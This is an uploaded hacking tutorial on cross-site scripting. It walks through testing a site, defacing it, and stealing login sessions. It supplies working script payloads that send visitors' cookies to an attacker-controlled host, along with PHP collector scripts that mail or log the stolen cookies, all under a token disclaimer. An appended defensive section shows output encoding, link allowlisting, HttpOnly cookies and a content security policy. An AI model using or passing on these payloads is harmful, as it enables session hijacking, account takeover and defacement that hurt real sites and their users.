XSS Tutorial - Cross Scripting Attacks

This document is a tutorial on how to execute Cross-Site Scripting (XSS) attacks on websites, detailing methods for vulnerability testing, defacing sites, and stealing login information. It provides specific code snippets for various attack techniques, including alerting cookies, redirecting users, and logging stolen data. The author disclaims responsibility for any misuse of the information presented.

Uploaded by

sbhdsbsddbhd78
CROSS SCRIPTING ATTACK - XSS

In this tutorial I will show you how to hack a website using XSS. The ones I used for
demonstration I did not hurt, and I take no responsibility if you do use them.

Parts Of The Tutorial:

1) Vulnerability Test
2) Defacing
3) Stealing Login Information

Vulnerability Test:

It's pretty simple to find an XSS vulnerability.

Steps:

1) Find a textbox on the site, or anything else where you can submit text.

2) Type in the following:


Code:
<script>alert("XSS");</script>

Defacing:

There are some ways to deface a site when you find an XSS vulnerability.

Makes A Picture Pop-Up:

Code:
"><script>location="www.removed.com/YOURDEFACEPIC";</script>

Replace The Content Of The Page By An Image:


Code:
<img src="yourevilpic.com">

Redirect To A Webpage:
Code:
<meta http-equiv="refresh"
content="0;url=http://www.youhacx0rpic.com/Haxored.html" />

Stealing Login Information:

The first way to do it is to put the following code in the textbox. If there is a
Username field and a Password field, just put it in both.
Code:
<script>alert(document.cookie);</script>

It should look like this if it is vulnerable and there is any login information:

Then just get a cookie editor for Firefox or use the Opera browser (which has a cookie
editing function).

Cookie Stealing:

In this way of cookie stealing, you set up files on a server and then you inject XSS into
the login(s)/URL.
I didn't make the code for this part, that's why I don't explain too much.

URL/Login:

Code:
<script>alert(www.yoursite.com/cookiestealer.php)</script>

OR

Code:
<script>document.location='www.yoursite.com/cookiestealer.php?cookie=
'+escape(document.cookie) </script>

OR

Code:
<script>
document.location = 'http://yoursite.com/steal.php?cookie=' +
document.cookie;
</script>

Cookiestealer.php:

Code:
<?

mail("Your-Email@gmail.com","cookie monster",$_REQUEST['cookie']);

?>
<html>
<script>document.location='http://tutorialblog.org/free-vector-
downloads-part2/'</script>
</html>

OR

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

For the one above, you should have the following files on your server:
- cookiestealer.php (the script)
- log.txt (the file where the logs will be stored)

This is for any page that has a text box and a submit button and that accepts
HTML tags (like blog comment forms):

Code:
<a
href="javascript:void(document.location='http://yoursite.com/cookiest
ealer.php?cookie='+
document.cookie)">Something</a>

Tutorial made by ♠ÐΩ®l!Xu$♠™. Hope it helps ;)
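
The server-side controls that make the inputs in this tutorial inert, as an added example that is not part of the original document: output encoding for submitted text, a scheme allowlist for user-supplied links, and a session cookie that page script cannot read. The function names, the cookie name `session`, and the policy string are assumptions chosen for illustration.

```javascript
// Added defensive example; not code from the original tutorial.
// Names (escapeHtml, safeHref, renderComment, "session") are hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML body or a quoted attribute value,
// so submitted markup is displayed as text instead of being parsed.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only absolute http(s) URLs. The WHATWG URL parser lowercases the
// scheme and strips leading whitespace and embedded tabs/newlines, so
// disguised "javascript:" links are caught by the protocol check.
function safeHref(untrusted) {
  let url;
  try {
    url = new URL(String(untrusted));
  } catch {
    return '#'; // relative or unparsable input is rejected
  }
  return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : '#';
}

// Render a user comment: every untrusted value passes through an encoder
// that matches the context it lands in (text node, href attribute).
function renderComment(author, body, link) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)} ` +
    `<a href="${escapeHtml(safeHref(link))}" rel="noopener noreferrer">link</a></div>`;
}

// HttpOnly keeps the session cookie out of document.cookie; Secure and
// SameSite limit where the browser will send it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Content-Security-Policy value that refuses inline <script> blocks and
// scripts loaded from other origins, as a second layer behind encoding.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample input: the test string from the tutorial's first step.
const sample = renderComment('guest', '<script>alert("XSS");</script>', 'javascript:void(0)');
console.log(sample);
console.log('Set-Cookie:', sessionCookieHeader('constructed-id-123'));
console.log('Content-Security-Policy:', CSP_HEADER);
```

Encoding must match the output context: `escapeHtml` covers HTML text and quoted attributes only, not values written into script blocks, CSS, or unquoted attributes.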
